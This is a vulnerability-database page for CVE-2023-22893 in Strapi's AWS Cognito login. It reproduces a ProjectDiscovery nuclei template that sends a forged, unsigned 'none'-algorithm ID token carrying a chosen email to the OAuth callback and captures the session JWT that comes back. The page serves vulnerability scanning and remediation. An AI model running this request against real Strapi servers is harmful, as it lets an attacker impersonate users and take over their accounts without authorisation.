Strapi Versions <=4.5.6 - Authentication Bypass

Published: 02 Jul 2026 09:36:57 · Reported by: ProjectDiscovery · Type: nuclei · Source: github.com · 48 views

Strapi through 4.5.5 (CVE-2023-22893, fixed in 4.5.6) does not verify the access token or ID token returned in the OAuth callback when AWS Cognito is the login provider, so an ID token whose header declares the 'none' algorithm is accepted as-is. A remote, unauthenticated attacker can forge such a token with an arbitrary email claim and impersonate any user who signs in through Cognito. The nuclei template below exercises this against /api/auth/cognito/callback and takes the victim's address as the "email" template variable, which must be supplied at run time.

Related

Reporter               Title                                                                                          Published
Circl                  CVE-2023-22893                                                                                 18 Apr 2023 09:12
CNNVD                  Strapi authorization vulnerability (title translated from Chinese)                             19 Apr 2023 00:00
CVE                    CVE-2023-22893                                                                                 19 Apr 2023 00:00
Cvelist                CVE-2023-22893                                                                                 19 Apr 2023 00:00
Github Security Blog   Strapi does not verify the access or ID tokens issued during the OAuth flow                    19 Apr 2023 18:33
NVD                    CVE-2023-22893                                                                                 19 Apr 2023 16:15
OSV                    GHSA-583X-23H9-F5W7 Strapi does not verify the access or ID tokens issued during the OAuth flow   19 Apr 2023 18:33
Prion                  Authentication flaw                                                                            19 Apr 2023 16:15
Positive Technologies  PT-2023-18757 · Amazon · Aws Cognito                                                           18 Apr 2023 00:00
RedhatCVE              CVE-2023-22893                                                                                 23 May 2025 03:16

Code
id: CVE-2023-22893

info:
  name: Strapi Versions <=4.5.6 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
  impact: |
    Unauthenticated attackers can forge JWT tokens using the "None" algorithm to bypass AWS Cognito authentication and impersonate any Strapi user, gaining unauthorized access to CMS content and administrative functions.
  remediation: |
    Update Strapi to version 4.5.6 or later which properly verifies access and ID tokens issued during OAuth flow with AWS Cognito login provider.
  reference:
    - https://www.ghostccamm.com/blog/multi_strapi_vulns
    - https://github.com/strapi/strapi/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22893
    cwe-id: CWE-287
    epss-score: 0.04158
    epss-percentile: 0.89625
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: strapi
    product: strapi
    fofa-query: app="strapi-Headless-CMS"
  tags: cve,cve2023,strapi,authenticated,aws,cognito,vkev,vuln

variables:
  email: "{{email}}"
  payload: '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'

http:
  - raw:
      - |
        GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"provider":'
          - '"confirmed":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".jwt"
# digest: 4a0a00473045022100b2ffd04bd0edf7be4eb8642cf7a1420e2527a9f72525e8d2ea255e143b4af91702201311624481b5a96defc04703bca134aa5a0b71fc91aff528157ad82f6c979524:922c64590222798bb761d5b6d8e72950

Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (high risk) · CVSS 3.1: 7.5 - 8.2 · EPSS: 0.04158